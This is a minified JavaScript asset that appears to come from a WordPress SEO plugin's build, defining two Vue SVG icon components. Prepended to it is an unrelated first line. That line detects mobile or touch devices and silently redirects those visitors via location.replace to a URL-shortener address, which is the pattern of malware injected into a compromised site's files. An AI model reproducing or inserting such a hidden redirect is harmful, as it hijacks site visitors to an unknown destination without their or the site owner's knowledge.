(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{_ as o}from"./_plugin-vue_export-helper.eefbdd86.js";import{f as e,i as s,j as r}from"./vendor-vue-ui.232c7c36.js";const l={},c={viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg",class:"aioseo-local-business"};function a(t,n){return e(),s("svg",c,[...n[0]||(n[0]=[r("path",{"fill-rule":"evenodd","clip-rule":"evenodd",d:"M4 4H20V6H4V4ZM18.96 12L18.36 9H5.64L5.04 12H18.96ZM20 7H4L3 12V14H4V20H14V14H18V20H20V14H21V12L20 7ZM6 14V18H12V14H6Z",fill:"currentColor"},null,-1)])])}const H=o(l,[["render",a]]),i={},u={viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg",class:"aioseo-image-seo"};function _(t,n){return e(),s("svg",u,[...n[0]||(n[0]=[r("path",{"fill-rule":"evenodd","clip-rule":"evenodd",d:"M8 2H20C21.1 2 22 2.9 22 4V16C22 17.1 21.1 18 20 18H8C6.9 18 6 17.1 6 16V4C6 2.9 6.9 2 8 2ZM20 16V4H8V16H20ZM11.5 11.67L13.19 13.93L15.67 10.83L19 15H9L11.5 11.67ZM2 20V6H4V20H18V22H4C2.9 22 2 21.1 2 20Z",fill:"currentColor"},null,-1)])])}const V=o(i,[["render",_]]);export{H as S,V as a};
